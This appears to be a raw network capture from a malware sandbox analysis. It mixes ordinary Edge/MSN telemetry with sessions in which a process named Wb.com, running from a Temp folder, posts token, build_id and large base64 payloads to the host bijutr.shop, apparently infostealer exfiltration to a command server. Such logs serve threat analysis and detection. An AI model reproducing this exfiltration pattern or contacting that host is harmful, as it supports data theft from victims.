                                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T16:15:17.175Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"locale
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:19 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=546aae7c282d4b649375037f7548f028&HASH=546a&LV=202412&V=4&LU=1734970519621; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=5441106e11374c6fa24a26c13344e660; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2445
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:19 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      46192.168.2.650013188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:19 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----S0HDTJW4EU3E37900ZUA
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 453
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:19 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 53 30 48 44 54 4a 57 34 45 55 33 45 33 37 39 30 30 5a 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 44 54 4a 57 34 45 55 33 45 33 37 39 30 30 5a 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 44 54 4a 57 34 45 55 33 45 33 37 39 30 30 5a 55 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------S0HDTJW4EU3E37900ZUAContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------S0HDTJW4EU3E37900ZUAContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------S0HDTJW4EU3E37900ZUACont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:20 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      47192.168.2.65001251.104.15.2534437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970517937&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 5371
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC5371OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 31 36 3a 31 35 3a 31 37 2e 39 33 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 39 64 63 61 30 33 39 2d 38 34 37 38 2d 34 31 37 31 2d 62 36 33 34 2d 38 39 61 64 62 61 37 37 36 33 64 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 33 34 31 31 36 38 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T16:15:17.935Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"locale
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=924b2008d4df49ba9f127f9c1b626e57&HASH=924b&LV=202412&V=4&LU=1734970520342; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=dba12319ad23497391a25172cb2027dc; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2405
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:19 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      48192.168.2.65001451.104.15.2534437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970518184&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 9830
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC9830OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 31 36 3a 31 35 3a 31 38 2e 31 38 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 39 64 63 61 30 33 39 2d 38 34 37 38 2d 34 31 37 31 2d 62 36 33 34 2d 38 39 61 64 62 61 37 37 36 33 64 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 33 34 31 31 36 38 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-23T16:15:18.183Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"loc
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=bbdbff2f9d1f480e86d50f322b9658f9&HASH=bbdb&LV=202412&V=4&LU=1734970520568; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=f63eed6b5c4f4500895b3ef3223437e8; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2384
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:19 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      49192.168.2.650020188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:22 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----4EKFKNOP8YMYUAI5P89H
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 98181
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:22 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 45 4b 46 4b 4e 4f 50 38 59 4d 59 55 41 49 35 50 38 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 46 4b 4e 4f 50 38 59 4d 59 55 41 49 35 50 38 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 46 4b 4e 4f 50 38 59 4d 59 55 41 49 35 50 38 39 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------4EKFKNOP8YMYUAI5P89HContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------4EKFKNOP8YMYUAI5P89HContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------4EKFKNOP8YMYUAI5P89HCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:22 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:22 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                                                      Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:22 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                                                      Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:22 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                                                      Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:22 UTC16355OUTData Raw: 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 2b 52 36 46 52 58 50 2b 43 34 5a 37 66 77 36 73 4d 38 54 52 62 4c 69 66 79 30 61 46 6f 51 45 38 78 69 75 45 59 6b 71 75 4d 59 47 54 67 59 72 6f 4b 47 49 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 66 52 53 55 55 41 46 46 46 46 41 42 53 64 71 57 6b 6f 41 57 6b 6f 6f 6f 41 4b 4b 53 69 67 42 61 53 69 69 67 41 6f 6f 6f 6f 41 4b 4b 53 69 67 42 61 4b
                                                                                                                                                                                                                                                                                                      Data Ascii: Irhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv+R6FRXP+C4Z7fw6sM8TRbLify0aFoQE8xiuEYkquMYGTgYroKGIKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAfRSUUAFFFFABSdqWkoAWkoooAKKSigBaSiigAooooAKKSigBaK
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:22 UTC51OUTData Raw: 62 58 2f 41 4b 2b 4a 76 2f 51 59 36 41 50 2f 32 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 46 4b 4e 4f 50 38 59 4d 59 55 41 49 35 50 38 39 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: bX/AK+Jv/QY6AP/2Q==------4EKFKNOP8YMYUAI5P89H--
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:24 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      50192.168.2.650031188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:26 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JM79RQ9Z58YM7YUKX4EC
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
